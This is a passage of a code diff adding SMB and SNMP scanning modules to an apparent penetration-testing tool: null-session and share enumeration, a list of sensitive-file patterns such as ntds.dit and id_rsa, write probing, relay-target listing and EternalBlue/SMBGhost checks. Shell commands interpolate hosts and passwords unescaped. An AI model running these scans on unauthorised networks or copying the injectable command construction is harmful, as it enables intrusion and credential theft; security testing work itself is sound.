+        `smbclient -L //${host} -N 2>&1`,
+        { timeout: 10000 }
+      )
+      const output = stdout + stderr
+
+      if (!output.includes("NT_STATUS_ACCESS_DENIED")) {
+        const shareMatches = output.match(/^\s+\S+\s+(Disk|IPC|Printer)/gm)
+        if (shareMatches) {
+          result.sharesAccessible = shareMatches.length
+          result.findings!.push(`${shareMatches.length} shares enumerable with null session`)
+        }
+      }
+    } catch {
+      // Share enumeration failed
+    }
+
+    // Test RPC user enumeration
+    try {
+      const { stdout, stderr } = await execAsync(
+        `rpcclient -U '' -N ${host} -c 'enumdomusers' 2>&1`,
+        { timeout: 10000 }
+      )
+      const output = stdout + stderr
+
+      if (!output.includes("NT_STATUS_ACCESS_DENIED") && output.includes("user:")) {
+        result.usersEnumerable = true
+        const userCount = (output.match(/user:\[/g) || []).length
+        result.findings!.push(`Users enumerable via RPC (${userCount} found)`)
+      }
+    } catch {
+      // RPC test failed
+    }
+
+    // Test RPC group enumeration
+    try {
+      const { stdout, stderr } = await execAsync(
+        `rpcclient -U '' -N ${host} -c 'enumdomgroups' 2>&1`,
+        { timeout: 10000 }
+      )
+      const output = stdout + stderr
+
+      if (!output.includes("NT_STATUS_ACCESS_DENIED") && output.includes("group:")) {
+        result.groupsEnumerable = true
+        const groupCount = (output.match(/group:\[/g) || []).length
+        result.findings!.push(`Groups enumerable via RPC (${groupCount} found)`)
+      }
+    } catch {
+      // Group enumeration failed
+    }
+
+    return result
+  }
+
+  /**
+   * Test guest session access.
+   */
+  export async function testGuestSession(
+    host: string,
+    options: SessionTestOptions = {}
+  ): Promise<NullSessionResult> {
+    const timeout = options.timeout || 30000
+    const result: NullSessionResult = {
+      host,
+      allowed: false,
+      sharesAccessible: 0,
+      usersEnumerable: false,
+      groupsEnumerable: false,
+      passwordPolicyAccessible: false,
+      findings: [],
+    }
+
+    log.info("Testing guest session access", { host })
+
+    // Test with guest account
+    try {
+      const { stdout, stderr } = await execAsync(
+        `smbclient -L //${host} -U 'guest%' 2>&1`,
+        { timeout }
+      )
+      const output = stdout + stderr
+
+      if (!output.includes("NT_STATUS_LOGON_FAILURE") && !output.includes("NT_STATUS_ACCOUNT_DISABLED")) {
+        result.allowed = true
+        result.findings.push("Guest account is enabled")
+
+        const shareMatches = output.match(/^\s+\S+\s+(Disk|IPC|Printer)/gm)
+        if (shareMatches) {
+          result.sharesAccessible = shareMatches.length
+          result.findings.push(`${shareMatches.length} shares accessible with guest account`)
+        }
+      }
+    } catch {
+      // Guest session test failed
+    }
+
+    log.info("Guest session test complete", { host, allowed: result.allowed })
+    return result
+  }
+
+  /**
+   * Enumerate sessions on a host (requires admin).
+   */
+  export async function enumerateActiveSessions(
+    host: string,
+    auth: { username: string; password: string; domain?: string },
+    options: SessionTestOptions = {}
+  ): Promise<{ user: string; computer: string; time: string }[]> {
+    const timeout = options.timeout || 30000
+    const sessions: { user: string; computer: string; time: string }[] = []
+
+    try {
+      const authStr = auth.domain
+        ? `${auth.domain}\\${auth.username}%${auth.password}`
+        : `${auth.username}%${auth.password}`
+
+      const { stdout } = await execAsync(
+        `rpcclient -U '${authStr}' ${host} -c 'netsessenum' 2>&1`,
+        { timeout }
+      )
+
+      // Parse session output
+      const lines = stdout.split("\n")
+      for (const line of lines) {
+        const match = line.match(/user:\s*(\S+)\s+computer:\s*(\S+)\s+time:\s*(.+)/i)
+        if (match) {
+          sessions.push({
+            user: match[1],
+            computer: match[2],
+            time: match[3].trim(),
+          })
+        }
+      }
+    } catch (err) {
+      log.debug("Failed to enumerate sessions", { host, error: String(err) })
+    }
+
+    return sessions
+  }
+
+  /**
+   * Check if anonymous login is restricted.
+   */
+  export async function checkAnonymousRestriction(
+    host: string,
+    options: SessionTestOptions = {}
+  ): Promise<{ restricted: boolean; level?: number; findings: string[] }> {
+    const findings: string[] = []
+
+    // Try to detect RestrictAnonymous registry setting
+    const nullResult = await testNullSession(host, options)
+
+    if (nullResult.allowed && nullResult.usersEnumerable) {
+      findings.push("RestrictAnonymous is likely set to 0 (no restriction)")
+      return { restricted: false, level: 0, findings }
+    } else if (nullResult.allowed && !nullResult.usersEnumerable) {
+      findings.push("RestrictAnonymous is likely set to 1 (restricted enumeration)")
+      return { restricted: true, level: 1, findings }
+    } else {
+      findings.push("RestrictAnonymous is likely set to 2 (full restriction)")
+      return { restricted: true, level: 2, findings }
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/smb/shares.ts b/packages/opencode/src/pentest/netscan/smb/shares.ts
new file mode 100644
index 00000000000..32a0ac07624
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/smb/shares.ts
@@ -0,0 +1,335 @@
+/**
+ * @fileoverview SMB Share Enumeration
+ *
+ * Enumerate and test SMB shares on target hosts.
+ *
+ * @module pentest/netscan/smb/shares
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { CrackMapExecParser } from "../parsers/crackmapexec"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.smb.shares" })
+
+/**
+ * Authentication credentials for SMB.
+ */
+export interface SMBAuth {
+  username: string
+  password: string
+  domain?: string
+  hash?: string
+}
+
+/**
+ * Share enumeration options.
+ */
+export interface ShareEnumOptions {
+  auth?: SMBAuth
+  timeout?: number
+  checkAccess?: boolean
+  listFiles?: boolean
+  maxDepth?: number
+}
+
+/**
+ * Sensitive file patterns.
+ */
+const SENSITIVE_PATTERNS = [
+  /password/i,
+  /credential/i,
+  /secret/i,
+  /\.kdbx$/i,
+  /\.key$/i,
+  /\.pem$/i,
+  /\.pfx$/i,
+  /id_rsa/i,
+  /\.env$/i,
+  /config\.xml$/i,
+  /web\.config$/i,
+  /\.htpasswd$/i,
+  /shadow$/,
+  /passwd$/,
+  /\.vmdk$/i,
+  /\.vhd$/i,
+  /ntds\.dit$/i,
+  /sam$/i,
+  /system$/i,
+  /security$/i,
+]
+
+/**
+ * SMB shares namespace.
+ */
+export namespace SMBShares {
+  /**
+   * Enumerate SMB shares on a host.
+   */
+  export async function enumerate(
+    host: string,
+    options: ShareEnumOptions = {}
+  ): Promise<NetScanTypes.SMBShare[]> {
+    const timeout = options.timeout || 30000
+    const shares: NetScanTypes.SMBShare[] = []
+
+    log.info("Enumerating SMB shares", { host })
+
+    try {
+      // Try CrackMapExec first
+      const cmeResult = await enumerateWithCME(host, options)
+      if (cmeResult.length > 0) {
+        shares.push(...cmeResult)
+      }
+    } catch (err) {
+      log.debug("CME enumeration failed, trying smbclient", { host, error: String(err) })
+    }
+
+    // Fallback to smbclient
+    if (shares.length === 0) {
+      try {
+        const smbResult = await enumerateWithSmbclient(host, options)
+        shares.push(...smbResult)
+      } catch (err) {
+        log.debug("smbclient enumeration failed", { host, error: String(err) })
+      }
+    }
+
+    // Check access permissions if requested
+    if (options.checkAccess && shares.length > 0) {
+      await checkShareAccess(host, shares, options)
+    }
+
+    // List files if requested
+    if (options.listFiles && shares.length > 0) {
+      for (const share of shares) {
+        if (share.permissions.read) {
+          try {
+            const files = await listShareFiles(host, share.name, options)
+            share.files = files
+            share.sensitiveFiles = files.filter((f) =>
+              SENSITIVE_PATTERNS.some((p) => p.test(f))
+            )
+          } catch (err) {
+            log.debug("Failed to list files in share", { host, share: share.name })
+          }
+        }
+      }
+    }
+
+    log.info("SMB share enumeration complete", { host, shareCount: shares.length })
+    return shares
+  }
+
+  /**
+   * Enumerate shares using CrackMapExec.
+   */
+  async function enumerateWithCME(
+    host: string,
+    options: ShareEnumOptions
+  ): Promise<NetScanTypes.SMBShare[]> {
+    let cmd = `crackmapexec smb ${host} --shares`
+
+    if (options.auth) {
+      if (options.auth.domain) {
+        cmd += ` -d '${options.auth.domain}'`
+      }
+      cmd += ` -u '${options.auth.username}'`
+      if (options.auth.hash) {
+        cmd += ` -H '${options.auth.hash}'`
+      } else {
+        cmd += ` -p '${options.auth.password}'`
+      }
+    } else {
+      cmd += " -u '' -p ''"
+    }
+
+    const { stdout } = await execAsync(cmd, { timeout: options.timeout || 30000 })
+    const results = CrackMapExecParser.parse(stdout)
+    return CrackMapExecParser.toSMBShares(results)
+  }
+
+  /**
+   * Enumerate shares using smbclient.
+   */
+  async function enumerateWithSmbclient(
+    host: string,
+    options: ShareEnumOptions
+  ): Promise<NetScanTypes.SMBShare[]> {
+    let cmd = `smbclient -L //${host} -N`
+
+    if (options.auth) {
+      cmd = `smbclient -L //${host} -U '${options.auth.domain || ""}\\${options.auth.username}%${options.auth.password}'`
+    }
+
+    const { stdout } = await execAsync(cmd, { timeout: options.timeout || 30000 })
+    return parseSmbclientList(stdout)
+  }
+
+  /**
+   * Parse smbclient -L output.
+   */
+  function parseSmbclientList(output: string): NetScanTypes.SMBShare[] {
+    const shares: NetScanTypes.SMBShare[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Format: Sharename       Type      Comment
+      const match = line.match(/^\s+([\w$]+)\s+(Disk|IPC|Printer)\s*(.*)/)
+      if (match) {
+        const name = match[1]
+        const typeStr = match[2].toLowerCase()
+
+        let type: "disk" | "printer" | "ipc" | "admin" = "disk"
+        if (typeStr === "ipc") type = "ipc"
+        else if (typeStr === "printer") type = "printer"
+        else if (name.endsWith("$")) type = "admin"
+
+        shares.push({
+          name,
+          type,
+          path: match[3]?.trim(),
+          permissions: { read: false, write: false, anonymous: false },
+          sensitiveFiles: [],
+        })
+      }
+    }
+
+    return shares
+  }
+
+  /**
+   * Check access permissions on shares.
+   */
+  async function checkShareAccess(
+    host: string,
+    shares: NetScanTypes.SMBShare[],
+    options: ShareEnumOptions
+  ): Promise<void> {
+    for (const share of shares) {
+      if (share.type === "ipc") continue
+
+      try {
+        // Try to connect and list
+        let cmd = `smbclient //${host}/${share.name} -N -c 'ls' 2>&1`
+        if (options.auth) {
+          cmd = `smbclient //${host}/${share.name} -U '${options.auth.domain || ""}\\${options.auth.username}%${options.auth.password}' -c 'ls' 2>&1`
+        }
+
+        const { stdout, stderr } = await execAsync(cmd, { timeout: 10000 })
+        const output = stdout + stderr
+
+        if (!output.includes("NT_STATUS_ACCESS_DENIED") && !output.includes("NT_STATUS_BAD_NETWORK_NAME")) {
+          share.permissions.read = true
+          share.permissions.anonymous = !options.auth
+
+          // Test write access
+          try {
+            let writeCmd = `smbclient //${host}/${share.name} -N -c 'mkdir .test_write_access' 2>&1`
+            if (options.auth) {
+              writeCmd = `smbclient //${host}/${share.name} -U '${options.auth.domain || ""}\\${options.auth.username}%${options.auth.password}' -c 'mkdir .test_write_access' 2>&1`
+            }
+
+            const writeResult = await execAsync(writeCmd, { timeout: 5000 })
+            if (!writeResult.stdout.includes("NT_STATUS_ACCESS_DENIED")) {
+              share.permissions.write = true
+              // Clean up test directory
+              const cleanCmd = options.auth
+                ? `smbclient //${host}/${share.name} -U '${options.auth.domain || ""}\\${options.auth.username}%${options.auth.password}' -c 'rmdir .test_write_access'`
+                : `smbclient //${host}/${share.name} -N -c 'rmdir .test_write_access'`
+              await execAsync(cleanCmd, { timeout: 5000 }).catch(() => {})
+            }
+          } catch {
+            // Write access test failed, that's ok
+          }
+        }
+      } catch {
+        // Access check failed
+      }
+    }
+  }
+
+  /**
+   * List files in a share.
+   */
+  async function listShareFiles(
+    host: string,
+    shareName: string,
+    options: ShareEnumOptions,
+    path: string = "",
+    depth: number = 0
+  ): Promise<string[]> {
+    const maxDepth = options.maxDepth || 2
+    if (depth > maxDepth) return []
+
+    const files: string[] = []
+
+    let cmd = `smbclient //${host}/${shareName} -N -c 'cd "${path}"; ls' 2>&1`
+    if (options.auth) {
+      cmd = `smbclient //${host}/${shareName} -U '${options.auth.domain || ""}\\${options.auth.username}%${options.auth.password}' -c 'cd "${path}"; ls' 2>&1`
+    }
+
+    try {
+      const { stdout } = await execAsync(cmd, { timeout: 10000 })
+      const lines = stdout.split("\n")
+
+      for (const line of lines) {
+        // Parse smbclient ls output
+        const match = line.match(/^\s+([\w\-\.]+)\s+([DAHSR]+)\s+\d+\s+/)
+        if (match) {
+          const name = match[1]
+          const attrs = match[2]
+
+          if (name === "." || name === "..") continue
+
+          const fullPath = path ? `${path}/${name}` : name
+          files.push(fullPath)
+
+          // Recurse into directories
+          if (attrs.includes("D") && depth < maxDepth) {
+            const subFiles = await listShareFiles(host, shareName, options, fullPath, depth + 1)
+            files.push(...subFiles)
+          }
+        }
+      }
+    } catch {
+      // Failed to list files
+    }
+
+    return files
+  }
+
+  /**
+   * Find sensitive files in enumerated shares.
+   */
+  export function findSensitiveFiles(shares: NetScanTypes.SMBShare[]): string[] {
+    const sensitive: string[] = []
+
+    for (const share of shares) {
+      if (share.sensitiveFiles) {
+        for (const file of share.sensitiveFiles) {
+          sensitive.push(`\\\\${share.name}\\${file}`)
+        }
+      }
+    }
+
+    return sensitive
+  }
+
+  /**
+   * Get writable shares.
+   */
+  export function getWritableShares(shares: NetScanTypes.SMBShare[]): NetScanTypes.SMBShare[] {
+    return shares.filter((s) => s.permissions.write)
+  }
+
+  /**
+   * Get anonymously accessible shares.
+   */
+  export function getAnonymousShares(shares: NetScanTypes.SMBShare[]): NetScanTypes.SMBShare[] {
+    return shares.filter((s) => s.permissions.anonymous && (s.permissions.read || s.permissions.write))
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/smb/signing.ts b/packages/opencode/src/pentest/netscan/smb/signing.ts
new file mode 100644
index 00000000000..b624394394c
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/smb/signing.ts
@@ -0,0 +1,234 @@
+/**
+ * @fileoverview SMB Signing Checks
+ *
+ * Check SMB signing configuration on target hosts.
+ *
+ * @module pentest/netscan/smb/signing
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { CrackMapExecParser } from "../parsers/crackmapexec"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.smb.signing" })
+
+/**
+ * SMB signing status.
+ */
+export interface SMBSigningStatus {
+  host: string
+  required: boolean
+  enabled: boolean
+  vulnerable: boolean
+  smbVersion?: string
+  findings: string[]
+}
+
+/**
+ * Signing check options.
+ */
+export interface SigningCheckOptions {
+  timeout?: number
+}
+
+/**
+ * SMB signing namespace.
+ */
+export namespace SMBSigning {
+  /**
+   * Check SMB signing on a host.
+   */
+  export async function check(
+    host: string,
+    options: SigningCheckOptions = {}
+  ): Promise<SMBSigningStatus> {
+    const timeout = options.timeout || 30000
+    const result: SMBSigningStatus = {
+      host,
+      required: true,
+      enabled: true,
+      vulnerable: false,
+      findings: [],
+    }
+
+    log.info("Checking SMB signing", { host })
+
+    try {
+      // Use CrackMapExec for reliable detection
+      const cmeResult = await checkWithCME(host, timeout)
+      Object.assign(result, cmeResult)
+    } catch (err) {
+      log.debug("CME signing check failed, trying nmap", { host, error: String(err) })
+
+      try {
+        const nmapResult = await checkWithNmap(host, timeout)
+        Object.assign(result, nmapResult)
+      } catch {
+        log.debug("Nmap signing check failed", { host })
+      }
+    }
+
+    // Determine vulnerability
+    result.vulnerable = !result.required
+    if (result.vulnerable) {
+      result.findings.push("SMB signing is not required - vulnerable to relay attacks")
+    }
+    if (!result.enabled) {
+      result.findings.push("SMB signing is disabled")
+    }
+
+    log.info("SMB signing check complete", {
+      host,
+      required: result.required,
+      vulnerable: result.vulnerable,
+    })
+
+    return result
+  }
+
+  /**
+   * Check signing using CrackMapExec.
+   */
+  async function checkWithCME(
+    host: string,
+    timeout: number
+  ): Promise<Partial<SMBSigningStatus>> {
+    const { stdout } = await execAsync(
+      `crackmapexec smb ${host} 2>&1`,
+      { timeout }
+    )
+
+    const results = CrackMapExecParser.parse(stdout)
+    const signingInfo = CrackMapExecParser.extractSigningInfo(results)
+    const hostSigning = signingInfo.get(host)
+
+    if (hostSigning) {
+      return {
+        required: hostSigning.required,
+        enabled: hostSigning.enabled,
+        findings: [],
+      }
+    }
+
+    // Parse from raw output
+    const signingMatch = stdout.match(/$signing:(True|False)$/i)
+    if (signingMatch) {
+      const required = signingMatch[1].toLowerCase() === "true"
+      return {
+        required,
+        enabled: required,
+        findings: [],
+      }
+    }
+
+    throw new Error("Could not determine signing status from CME output")
+  }
+
+  /**
+   * Check signing using Nmap.
+   */
+  async function checkWithNmap(
+    host: string,
+    timeout: number
+  ): Promise<Partial<SMBSigningStatus>> {
+    const { stdout } = await execAsync(
+      `nmap -p 445 --script smb2-security-mode ${host} 2>&1`,
+      { timeout }
+    )
+
+    const result: Partial<SMBSigningStatus> = {
+      findings: [],
+    }
+
+    // Parse Nmap output
+    if (stdout.includes("Message signing enabled but not required")) {
+      result.required = false
+      result.enabled = true
+    } else if (stdout.includes("Message signing enabled and required")) {
+      result.required = true
+      result.enabled = true
+    } else if (stdout.includes("Message signing disabled")) {
+      result.required = false
+      result.enabled = false
+    } else if (stdout.includes("Message signing is disabled")) {
+      result.required = false
+      result.enabled = false
+    }
+
+    // Extract SMB version
+    const versionMatch = stdout.match(/SMB\s*(1|2|3)(?:\.\d+)?/i)
+    if (versionMatch) {
+      result.smbVersion = `SMB${versionMatch[1]}`
+    }
+
+    return result
+  }
+
+  /**
+   * Check multiple hosts for signing.
+   */
+  export async function checkMultiple(
+    hosts: string[],
+    options: SigningCheckOptions = {}
+  ): Promise<SMBSigningStatus[]> {
+    const results: SMBSigningStatus[] = []
+
+    for (const host of hosts) {
+      try {
+        const result = await check(host, options)
+        results.push(result)
+      } catch (err) {
+        log.warn("Failed to check signing on host", { host, error: String(err) })
+        results.push({
+          host,
+          required: true,
+          enabled: true,
+          vulnerable: false,
+          findings: ["Failed to check signing status"],
+        })
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Get hosts vulnerable to relay attacks.
+   */
+  export function getVulnerableHosts(results: SMBSigningStatus[]): string[] {
+    return results.filter((r) => r.vulnerable).map((r) => r.host)
+  }
+
+  /**
+   * Format signing results for display.
+   */
+  export function formatResults(results: SMBSigningStatus[]): string {
+    const lines: string[] = []
+    lines.push("| Host | Signing Required | Signing Enabled | Vulnerable |")
+    lines.push("|------|-----------------|-----------------|------------|")
+
+    for (const result of results) {
+      lines.push(
+        `| ${result.host} | ${result.required ? "Yes" : "No"} | ${result.enabled ? "Yes" : "No"} | ${result.vulnerable ? "Yes" : "No"} |`
+      )
+    }
+
+    const vulnerable = results.filter((r) => r.vulnerable).length
+    lines.push("")
+    lines.push(`Summary: ${vulnerable}/${results.length} hosts vulnerable to SMB relay`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Generate relay target list.
+   */
+  export function generateRelayTargets(results: SMBSigningStatus[]): string {
+    return results
+      .filter((r) => r.vulnerable)
+      .map((r) => r.host)
+      .join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/smb/vulns.ts b/packages/opencode/src/pentest/netscan/smb/vulns.ts
new file mode 100644
index 00000000000..a2dc11f87e6
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/smb/vulns.ts
@@ -0,0 +1,406 @@
+/**
+ * @fileoverview SMB Vulnerability Detection
+ *
+ * Detect known SMB vulnerabilities like EternalBlue, SMBGhost, etc.
+ *
+ * @module pentest/netscan/smb/vulns
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.smb.vulns" })
+
+/**
+ * SMB vulnerability.
+ */
+export interface SMBVulnerability {
+  name: string
+  cve: string
+  severity: "critical" | "high" | "medium" | "low"
+  description: string
+  exploitable: boolean
+  msRating?: string
+}
+
+/**
+ * Vulnerability check result.
+ */
+export interface SMBVulnResult {
+  host: string
+  port: number
+  smbVersion?: string
+  osVersion?: string
+  vulnerabilities: SMBVulnerability[]
+  findings: string[]
+}
+
+/**
+ * Vulnerability check options.
+ */
+export interface VulnCheckOptions {
+  timeout?: number
+  checks?: ("eternalblue" | "smbghost" | "printnightmare" | "petitpotam" | "all")[]
+}
+
+/**
+ * Known SMB vulnerabilities database.
+ */
+const VULN_DB: Record<string, Omit<SMBVulnerability, "exploitable">> = {
+  eternalblue: {
+    name: "EternalBlue",
+    cve: "CVE-2017-0144",
+    severity: "critical",
+    description: "Windows SMBv1 Remote Code Execution (MS17-010)",
+    msRating: "MS17-010",
+  },
+  eternalromance: {
+    name: "EternalRomance",
+    cve: "CVE-2017-0145",
+    severity: "critical",
+    description: "Windows SMBv1 Remote Code Execution (MS17-010)",
+    msRating: "MS17-010",
+  },
+  smbghost: {
+    name: "SMBGhost",
+    cve: "CVE-2020-0796",
+    severity: "critical",
+    description: "Windows SMBv3 Remote Code Execution",
+    msRating: "ADV200005",
+  },
+  printnightmare: {
+    name: "PrintNightmare",
+    cve: "CVE-2021-34527",
+    severity: "critical",
+    description: "Windows Print Spooler Remote Code Execution",
+    msRating: "CVE-2021-34527",
+  },
+  petitpotam: {
+    name: "PetitPotam",
+    cve: "CVE-2021-36942",
+    severity: "high",
+    description: "Windows NTLM Relay via EFS RPC",
+    msRating: "ADV210003",
+  },
+  zerologon: {
+    name: "Zerologon",
+    cve: "CVE-2020-1472",
+    severity: "critical",
+    description: "Netlogon Elevation of Privilege",
+    msRating: "CVE-2020-1472",
+  },
+}
+
+/**
+ * SMB vulnerabilities namespace.
+ */
+export namespace SMBVulns {
+  /**
+   * Check for SMB vulnerabilities on a host.
+   */
+  export async function check(
+    host: string,
+    options: VulnCheckOptions = {}
+  ): Promise<SMBVulnResult> {
+    const timeout = options.timeout || 120000
+    const checks = options.checks || ["all"]
+    const shouldCheckAll = checks.includes("all")
+
+    const result: SMBVulnResult = {
+      host,
+      port: 445,
+      vulnerabilities: [],
+      findings: [],
+    }
+
+    log.info("Checking SMB vulnerabilities", { host, checks })
+
+    // Get OS version first for better detection
+    try {
+      const osInfo = await getOSVersion(host, timeout)
+      result.osVersion = osInfo.os
+      result.smbVersion = osInfo.smbVersion
+    } catch {
+      log.debug("Could not determine OS version", { host })
+    }
+
+    // Check each vulnerability
+    if (shouldCheckAll || checks.includes("eternalblue")) {
+      try {
+        const eternalblue = await checkEternalBlue(host, timeout)
+        if (eternalblue) {
+          result.vulnerabilities.push(eternalblue)
+          result.findings.push(`EternalBlue (${eternalblue.cve}): Host is VULNERABLE`)
+        }
+      } catch (err) {
+        log.debug("EternalBlue check failed", { host, error: String(err) })
+      }
+    }
+
+    if (shouldCheckAll || checks.includes("smbghost")) {
+      try {
+        const smbghost = await checkSMBGhost(host, timeout)
+        if (smbghost) {
+          result.vulnerabilities.push(smbghost)
+          result.findings.push(`SMBGhost (${smbghost.cve}): Host is VULNERABLE`)
+        }
+      } catch (err) {
+        log.debug("SMBGhost check failed", { host, error: String(err) })
+      }
+    }
+
+    if (shouldCheckAll || checks.includes("printnightmare")) {
+      try {
+        const printnightmare = await checkPrintNightmare(host, timeout)
+        if (printnightmare) {
+          result.vulnerabilities.push(printnightmare)
+          result.findings.push(`PrintNightmare (${printnightmare.cve}): Host may be VULNERABLE`)
+        }
+      } catch (err) {
+        log.debug("PrintNightmare check failed", { host, error: String(err) })
+      }
+    }
+
+    if (shouldCheckAll || checks.includes("petitpotam")) {
+      try {
+        const petitpotam = await checkPetitPotam(host, timeout)
+        if (petitpotam) {
+          result.vulnerabilities.push(petitpotam)
+          result.findings.push(`PetitPotam (${petitpotam.cve}): EFS RPC exposed`)
+        }
+      } catch (err) {
+        log.debug("PetitPotam check failed", { host, error: String(err) })
+      }
+    }
+
+    log.info("SMB vulnerability check complete", {
+      host,
+      vulnCount: result.vulnerabilities.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Get OS version via SMB.
+   */
+  async function getOSVersion(
+    host: string,
+    timeout: number
+  ): Promise<{ os?: string; smbVersion?: string }> {
+    const { stdout } = await execAsync(
+      `crackmapexec smb ${host} 2>&1`,
+      { timeout }
+    )
+
+    const osMatch = stdout.match(/Windows [^(]+/)
+    const smbMatch = stdout.match(/$SMBv(\d)$/i)
+
+    return {
+      os: osMatch?.[0]?.trim(),
+      smbVersion: smbMatch ? `SMBv${smbMatch[1]}` : undefined,
+    }
+  }
+
+  /**
+   * Check for EternalBlue (MS17-010).
+   */
+  async function checkEternalBlue(
+    host: string,
+    timeout: number
+  ): Promise<SMBVulnerability | null> {
+    try {
+      const { stdout } = await execAsync(
+        `nmap -p 445 --script smb-vuln-ms17-010 ${host} 2>&1`,
+        { timeout }
+      )
+
+      if (stdout.includes("VULNERABLE") || stdout.includes("State: VULNERABLE")) {
+        return { ...VULN_DB.eternalblue, exploitable: true }
+      }
+    } catch {
+      // Nmap check failed, try auxiliary check
+    }
+
+    // Fallback: Check SMBv1 enabled
+    try {
+      const { stdout } = await execAsync(
+        `crackmapexec smb ${host} 2>&1`,
+        { timeout: 10000 }
+      )
+
+      if (stdout.includes("(SMBv1:True)")) {
+        // SMBv1 enabled is a prerequisite
+        return { ...VULN_DB.eternalblue, exploitable: false }
+      }
+    } catch {
+      // CME check failed
+    }
+
+    return null
+  }
+
+  /**
+   * Check for SMBGhost (CVE-2020-0796).
+   */
+  async function checkSMBGhost(
+    host: string,
+    timeout: number
+  ): Promise<SMBVulnerability | null> {
+    try {
+      const { stdout } = await execAsync(
+        `nmap -p 445 --script smb-vuln-cve-2020-0796 ${host} 2>&1`,
+        { timeout }
+      )
+
+      if (stdout.includes("VULNERABLE") || stdout.includes("compression is enabled")) {
+        return { ...VULN_DB.smbghost, exploitable: true }
+      }
+    } catch {
+      // Nmap script may not be available
+    }
+
+    // Version-based check
+    try {
+      const { stdout } = await execAsync(
+        `crackmapexec smb ${host} 2>&1`,
+        { timeout: 10000 }
+      )
+
+      // SMBGhost affects Windows 10 1903/1909 and Server 2019 1903/1909
+      if (stdout.match(/Windows 10.*(?:1903|1909)/i) || stdout.match(/Server 2019.*(?:1903|1909)/i)) {
+        return { ...VULN_DB.smbghost, exploitable: false }
+      }
+    } catch {
+      // CME check failed
+    }
+
+    return null
+  }
+
+  /**
+   * Check for PrintNightmare (CVE-2021-34527).
+   */
+  async function checkPrintNightmare(
+    host: string,
+    timeout: number
+  ): Promise<SMBVulnerability | null> {
+    try {
+      // Check if print spooler is running and accessible
+      const { stdout } = await execAsync(
+        `rpcclient -U '' -N ${host} -c 'enumprinters' 2>&1`,
+        { timeout }
+      )
+
+      if (!stdout.includes("NT_STATUS_ACCESS_DENIED") && !stdout.includes("Error")) {
+        // Print spooler is accessible
+        return { ...VULN_DB.printnightmare, exploitable: false }
+      }
+    } catch {
+      // RPC check failed
+    }
+
+    return null
+  }
+
+  /**
+   * Check for PetitPotam.
+   */
+  async function checkPetitPotam(
+    host: string,
+    timeout: number
+  ): Promise<SMBVulnerability | null> {
+    try {
+      // Check if EFS RPC is accessible
+      const { stdout } = await execAsync(
+        `rpcclient -U '' -N ${host} -c 'lsarpc' 2>&1`,
+        { timeout }
+      )
+
+      if (!stdout.includes("NT_STATUS_ACCESS_DENIED")) {
+        // LSARPC is accessible, which is used by PetitPotam
+        return { ...VULN_DB.petitpotam, exploitable: false }
+      }
+    } catch {
+      // RPC check failed
+    }
+
+    return null
+  }
+
+  /**
+   * Check multiple hosts for vulnerabilities.
+   */
+  export async function checkMultiple(
+    hosts: string[],
+    options: VulnCheckOptions = {}
+  ): Promise<SMBVulnResult[]> {
+    const results: SMBVulnResult[] = []
+
+    for (const host of hosts) {
+      try {
+        const result = await check(host, options)
+        results.push(result)
+      } catch (err) {
+        log.warn("Failed to check vulnerabilities on host", { host, error: String(err) })
+        results.push({
+          host,
+          port: 445,
+          vulnerabilities: [],
+          findings: ["Failed to check vulnerabilities"],
+        })
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Get critical vulnerabilities from results.
+   */
+  export function getCriticalVulns(results: SMBVulnResult[]): SMBVulnerability[] {
+    const critical: SMBVulnerability[] = []
+
+    for (const result of results) {
+      for (const vuln of result.vulnerabilities) {
+        if (vuln.severity === "critical" && vuln.exploitable) {
+          critical.push(vuln)
+        }
+      }
+    }
+
+    return critical
+  }
+
+  /**
+   * Format vulnerability results for display.
+   */
+  export function formatResults(results: SMBVulnResult[]): string {
+    const lines: string[] = []
+    lines.push("| Host | Vulnerability | CVE | Severity | Exploitable |")
+    lines.push("|------|---------------|-----|----------|-------------|")
+
+    for (const result of results) {
+      if (result.vulnerabilities.length === 0) {
+        lines.push(`| ${result.host} | None found | - | - | - |`)
+      } else {
+        for (const vuln of result.vulnerabilities) {
+          lines.push(
+            `| ${result.host} | ${vuln.name} | ${vuln.cve} | ${vuln.severity.toUpperCase()} | ${vuln.exploitable ? "Yes" : "Potential"} |`
+          )
+        }
+      }
+    }
+
+    const totalVulns = results.reduce((sum, r) => sum + r.vulnerabilities.length, 0)
+    const criticalVulns = getCriticalVulns(results).length
+
+    lines.push("")
+    lines.push(`Summary: ${totalVulns} vulnerabilities found across ${results.length} hosts`)
+    lines.push(`Critical exploitable: ${criticalVulns}`)
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/snmp/community.ts b/packages/opencode/src/pentest/netscan/snmp/community.ts
new file mode 100644
index 00000000000..6243e986559
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/snmp/community.ts
@@ -0,0 +1,344 @@
+/**
+ * @fileoverview SNMP Community String Testing
+ *
+ * Test and brute-force SNMP community strings.
+ *
+ * @module pentest/netscan/snmp/community
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.snmp.community" })
+
+/**
+ * Community test options.
+ */
+export interface CommunityTestOptions {
+  timeout?: number
+  version?: "v1" | "v2c"
+  port?: number
+}
+
+/**
+ * Community test result.
+ */
+export interface CommunityTestResult {
+  host: string
+  community: string
+  version: "v1" | "v2c"
+  valid: boolean
+  writeAccess: boolean
